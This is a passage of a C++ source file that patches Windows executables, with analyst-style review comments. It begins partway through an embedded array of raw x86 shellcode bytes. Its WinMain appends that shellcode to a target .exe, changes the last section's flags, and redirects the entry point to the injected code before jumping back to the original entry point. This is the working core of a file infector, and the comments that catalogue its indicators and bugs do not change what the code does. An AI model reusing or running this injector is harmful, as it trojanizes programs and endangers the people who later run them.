insertcode.cpp

"\x8B\x8D\x0C\xED\xFF\xFF\x83\xC1\x01\x89"
"\x8D\x0C\xED\xFF\xFF\x33\xD2\x85\xD2\x75"
"\xCF\x8D\x85\x24\xFE\xFF\xFF\x50\x6A\x00"
"\x6A\x00\x8D\x8D\x0C\xED\xFF\xFF\x51\x6A"
"\x00\xFF\x95\xC0\xBF\xFF\xFF\x89\x85\x10"
"\xEE\xFF\xFF\x83\xBD\x10\xEE\xFF\xFF\x00"
"\x0F\x84\xC8\x00\x00\x00\x83\xBD\x10\xEE"
"\xFF\xFF\xFF\x0F\x84\xBB\x00\x00\x00\x8D"
"\x95\x0C\xED\xFF\xFF\x52\x8B\x85\x08\xED"
"\xFF\xFF\x50\xFF\x95\xCC\xBF\xFF\xFF\x85"
"\xC0\x74\x21\x6A\x00\x68\x00\x10\x00\x00"
"\x8D\x8D\x18\xEE\xFF\xFF\x51\x8B\x95\x08"
"\xED\xFF\xFF\x52\xFF\x95\xBC\xBF\xFF\xFF"
"\x89\x85\x18\xFE\xFF\xFF\x83\xBD\x18\xFE"
"\xFF\xFF\x00\x77\x05\xE9\x56\x01\x00\x00"
"\x6A\x00\x8D\x85\x18\xFE\xFF\xFF\x50\x8B"
"\x8D\x18\xFE\xFF\xFF\x51\x8D\x95\x18\xEE"
"\xFF\xFF\x52\x8B\x85\x20\xFE\xFF\xFF\x50"
"\xFF\x95\xE4\xBF\xFF\xFF\x89\x85\x10\xEE"
"\xFF\xFF\x83\xBD\x10\xEE\xFF\xFF\x00\x75"
"\x05\xE9\x1C\x01\x00\x00\x83\xBD\x14\xEE"
"\xFF\xFF\x00\x75\x25\x6A\x00\x8D\x8D\x18"
"\xFE\xFF\xFF\x51\x6A\x01\x8D\x95\xC0\xEC"
"\xFF\xFF\x52\x8B\x85\x20\xFE\xFF\xFF\x50"
"\xFF\x95\xE4\xBF\xFF\xFF\x89\x85\x10\xEE"
"\xFF\xFF\x83\xBD\x10\xEE\xFF\xFF\x00\x75"
"\x05\xE9\xDE\x00\x00\x00\x68\x00\x10\x00"
"\x00\x6A\x00\x8D\x8D\x18\xEE\xFF\xFF\x51"
"\xFF\x95\x70\xBF\xFF\xFF\x83\xC4\x0C\x6A"
"\x00\x8D\x55\xFC\x52\x6A\x00\x6A\x00\x6A"
"\x00\x8B\x45\xC8\x50\xFF\x95\xE0\xBF\xFF"
"\xFF\x83\x7D\xFC\x00\x76\x5A\x6A\x00\x8D"
"\x8D\x18\xFE\xFF\xFF\x51\x8B\x55\xFC\x52"
"\x8D\x85\x18\xEE\xFF\xFF\x50\x8B\x4D\xC8"
"\x51\xFF\x95\xDC\xBF\xFF\xFF\x89\x85\x10"
"\xEE\xFF\xFF\x83\xBD\x10\xEE\xFF\xFF\x00"
"\x75\x02\xEB\x7A\x6A\x00\x8B\x55\xFC\x52"
"\x8D\x85\x18\xEE\xFF\xFF\x50\x8B\x8D\x08"
"\xED\xFF\xFF\x51\xFF\x95\xB8\xBF\xFF\xFF"
"\x89\x85\x10\xEE\xFF\xFF\x83\xBD\x10\xEE"
"\xFF\xFF\x00\x7F\x02\xEB\x4D\xE9\x1A\xFE"
"\xFF\xFF\x8B\x95\x20\xFE\xFF\xFF\x52\xFF"
"\x95\xF0\xBF\xFF\xFF\x8B\x45\xC8\x50\xFF"
"\x95\xF0\xBF\xFF\xFF\x8B\x4D\xD4\x51\xFF"
"\x95\xF0\xBF\xFF\xFF\x8B\x55\xCC\x52\xFF"
"\x95\xF0\xBF\xFF\xFF\x8B\x85\x08\xED\xFF"
"\xFF\x50\xFF\x95\xC4\xBF\xFF\xFF\x68\xE8"
"\x03\x00\x00\xFF\x95\xE8\xBF\xFF\xFF\xE9"
"\xDC\xFC\xFF\xFF\xEB\xB6\xEB\xB4\xEB\xB2"
"\xEB\xB0\xEB\xAE\x8B\xE5\x5D\xC3\x59\x51"
"\xC3\xE8\xF8\xFF\xFF\xFF\xC3\xB8";

// Four bytes that WinMain copies verbatim (memcpy of exactly 4 bytes) directly after
// the stored original-entry VA; the author's comment names the first two as `jmp eax`.
char code1[]="\xFF\xE0\xFF\x25"; //jmp eax

/*
 * Sample "append to last section" PE modifier from the article this listing was
 * taken from. Review notes, written from the analyst's side — what the visible
 * code does to a target file, and therefore what an investigator can look for:
 *  - opens a target .exe (from the command line, else a file dialog), maps it
 *    read/write and grows the mapping (and so the file) by code_size+30 bytes;
 *  - validates the DOS and NT signatures, walks to the LAST section header and
 *    rewrites its Characteristics to the flat constant 0xc2000040;
 *  - copies `code` to the old end of file, followed by the original entry-point
 *    VA and the 4 bytes of `code1`, then points OptionalHeader.AddressOfEntryPoint
 *    at the appended code and enlarges the last section (and SizeOfImage when
 *    the loop at the end decides it is needed).
 * Static indicators left behind: an entry point inside the last section, a last
 * section whose flags are an unusual fixed value, and an on-disk size that exceeds
 * PointerToRawData+SizeOfRawData of the last section by a small fixed slack.
 * `code` and the `jmpaddr` type are declared outside this listing.
 * Parameters: the standard WinMain set; none is read — the command line is
 *             re-fetched with GetCommandLine().
 * Returns: always 0, on success and on every failure path alike.
 */
int APIENTRY WinMain(HINSTANCE hInstance,

                     HINSTANCE hPrevInstance,

                     LPSTR     lpCmdLine,

                     int       nCmdShow)

{
	HANDLE h_file,f_Map;

	DWORD f_size,code_size,section_add,section_size,Secnumb,temp;

	jmpaddr *add_jmp;

	LPVOID f_Maddr,c_Maddr;

    char * FilterStrings="Executable Files\0*.exe\0";

    char of_Name[MAX_PATH],*pdest,*szBuffer;

	int result,cm=' ';

    OPENFILENAME ofn;

	LONG len;

	IMAGE_DOS_HEADER  *h_dos;

	IMAGE_NT_HEADERS  *h_nt;

	IMAGE_SECTION_HEADER *h_section;
// Open the target file: take everything after the first space of the command line,
// otherwise fall back to a file dialog.

	szBuffer=GetCommandLine();

	pdest = strchr( szBuffer, cm );

	// NOTE(review): pdest - szBuffer is evaluated before the NULL test below, so
	// when the command line has no space this is pointer arithmetic on NULL (UB).
	result = pdest - szBuffer + 1;

	if( pdest != NULL )
	{
		// NOTE(review): the copy length is derived from the command line, not from
		// sizeof(of_Name), and strncpy does not guarantee a terminator — the
		// strlen() on the next line may read past of_Name for a long command line.
		strncpy( of_Name,szBuffer+result, strlen(szBuffer)-result);
		if(strlen(of_Name)>3)
			goto begin;

	}

    of_Name[0]=0;

    FillMemory(&ofn,sizeof(OPENFILENAME),0);

    ofn.lStructSize=sizeof(OPENFILENAME);

    ofn.lpstrFilter=FilterStrings;

    ofn.nFilterIndex=1;

    ofn.lpstrFile=of_Name;

    ofn.nMaxFile=MAX_PATH;

    ofn.lpstrTitle="选择一个要更改的PE格式的可执行文件";

    ofn.Flags=OFN_FILEMUSTEXIST;

    if(GetOpenFileName(&ofn))
	{
		// Clears read-only etc. so the read/write open below can succeed.
		// (BOOL result compared against NULL — works because NULL is 0.)
		if(SetFileAttributes(of_Name,FILE_ATTRIBUTE_NORMAL)==NULL)
			return 0;
	}
	else
		return 0;

begin:

// Map the file into memory, read/write, with room for the appended bytes.

	h_file=CreateFile(of_Name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
		OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
		if(h_file==INVALID_HANDLE_VALUE)
				return 0;

	f_size=GetFileSize(h_file,NULL);

	// Targets above 500000 bytes are refused.
	// NOTE(review): this return leaks h_file (no CloseHandle on this path).
	if(f_size>500000)
		return 0;
	code_size=sizeof(code)-1;
	// Length of the code to be inserted (sizeof includes the literal's terminator).
	// The mapping is sized larger than the file, which extends the file on disk
	// immediately. Nothing later truncates it, so a target rejected at any
	// `goto endop` below is still left code_size+30 bytes larger than before.
	f_Map=CreateFileMapping(h_file, NULL,PAGE_READWRITE,0,f_size+code_size+30,0 );
		if(f_Map==NULL)
		{
			CloseHandle(h_file);
			return 0;
		}

	f_Maddr=MapViewOfFile(f_Map,FILE_MAP_WRITE,0,0,0 );
          	if(f_Maddr==NULL)

			{
				CloseHandle(f_Map);
				CloseHandle(h_file);
				return 0;
			}

// Check whether this is a PE file.

	// Inline asm used purely as a pointer cast: h_dos = (IMAGE_DOS_HEADER*)f_Maddr.
	_asm
	{
		mov edx,f_Maddr
		mov h_dos,edx
	}

	if(h_dos->e_magic==IMAGE_DOS_SIGNATURE )
	{
		len=h_dos->e_lfanew;
		// NOTE(review): only the offset itself is bounded by the file size; the
		// IMAGE_NT_HEADERS read through h_nt may still extend past the mapping.
		if(len>(long)f_size)
			goto endop;
	

		// h_nt = (IMAGE_NT_HEADERS*)((char*)h_dos + e_lfanew)
		_asm
		{
			mov edx,h_dos
			add edx,len
			mov h_nt,edx
		}

		if( h_nt->Signature!=IMAGE_NT_SIGNATURE )
			goto endop;
	

	}

	else
		goto endop;



// Find the last section header.
	Secnumb=h_nt->FileHeader.NumberOfSections;

	// h_section starts at the NT headers; the first loop iteration steps past
	// sizeof(IMAGE_NT_HEADERS) to the first section header, every later
	// iteration steps one IMAGE_SECTION_HEADER. After the loop h_section is the
	// last section header (assuming NumberOfSections >= 1 — otherwise it still
	// points at the NT headers and the writes below hit the wrong structure).
	_asm
	{
		mov edx,h_nt
		mov h_section,edx
	}

	len=sizeof(IMAGE_NT_HEADERS);

	for(temp=0;temp<Secnumb;temp++)
	{
		_asm
		{
			mov edx,h_section
			add edx,len
			mov h_section,edx
		}
// Change the last section's characteristics to 0xc2000040
// (= IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_DISCARDABLE |
//  IMAGE_SCN_CNT_INITIALIZED_DATA; the section's previous flags are discarded,
//  which is why a last section with exactly this value is a useful indicator).
// NOTE(review): braceless if — the assignment on the next line is its body.
		if(temp==Secnumb-1)
		h_section->Characteristics=0xc2000040;

		len=sizeof(IMAGE_SECTION_HEADER);
	}

// Check the file size against the last section's raw data address.
	// c_Maddr = f_Maddr + f_size: the old end of the file, where the code goes.
	_asm

	{
		mov edx,f_Maddr
		add edx,f_size
		mov c_Maddr,edx
	}

	section_add=h_section->PointerToRawData;
		// section_add = (c_Maddr - f_Maddr) - PointerToRawData
		//             = f_size - PointerToRawData, i.e. the end of file expressed
		// as an offset from the start of the last section's raw data.
		_asm
		{
			mov edx,c_Maddr
			sub edx,f_Maddr
			sub edx,section_add
			mov section_add,edx
		}

	// Bytes present after the last section's declared raw data (overlay).
	// DWORD arithmetic: if the file ends before the declared raw end this wraps
	// to a huge value and the check below rejects the file.
	section_size=section_add-h_section->SizeOfRawData;
	
	if(section_size>1000)
		goto endop;


// Append the code at the end of the file.

	memcpy((char*)c_Maddr,code,code_size);

// Write the return address: the original entry point as a VA, stored right
// after the copied code, then the 4 bytes of code1 after that.
	// add_jmp = (jmpaddr*)((char*)c_Maddr + code_size)
	_asm

	{
		mov edx,c_Maddr
		add edx,code_size
		mov add_jmp,edx
	}

	// jmpaddr is declared outside this listing; the "+4" on the next line implies
	// its jmp member is 4 bytes wide — confirm against the declaration.
	add_jmp->jmp=h_nt->OptionalHeader.AddressOfEntryPoint+h_nt->OptionalHeader.ImageBase;

	memcpy((char*)c_Maddr+code_size+4,code1,4);

// Compute the address of the code: the new entry point is the last section's
// VirtualAddress plus the offset (from its raw start) at which the code was written.

	h_nt->OptionalHeader.AddressOfEntryPoint=h_section->VirtualAddress+section_add;	

// Update the section sizes so the appended bytes are inside the last section.
// SizeOfRawData gets the same +30 slack that was added when sizing the mapping.

	h_section->Misc.VirtualSize=h_section->SizeOfRawData+section_size+code_size;
	h_section->SizeOfRawData=h_section->SizeOfRawData+section_size+code_size+30;

// If section size + code length exceeds the memory image, OptionalHeader.SizeOfImage
// must also be recalculated.
// NOTE(review): two braceless nested ifs — the while loop is the body of the
// inner one, so SizeOfImage is only grown (in 0x1000 steps) when both
// conditions hold.

	if(h_section->SizeOfRawData>h_section->Misc.VirtualSize)
	if(h_section->SizeOfRawData>0x1000)
		while(h_section->VirtualAddress+h_section->Misc.VirtualSize>h_nt->OptionalHeader.SizeOfImage)
			h_nt->OptionalHeader.SizeOfImage=h_nt->OptionalHeader.SizeOfImage+0x1000;
	
endop:
	// Shared exit for both the success path and every rejected target: the view
	// is unmapped (flushing any edits made above) and the handles are closed.
	UnmapViewOfFile( f_Maddr);
	CloseHandle(f_Map);
	CloseHandle(h_file);
	return 0;

}
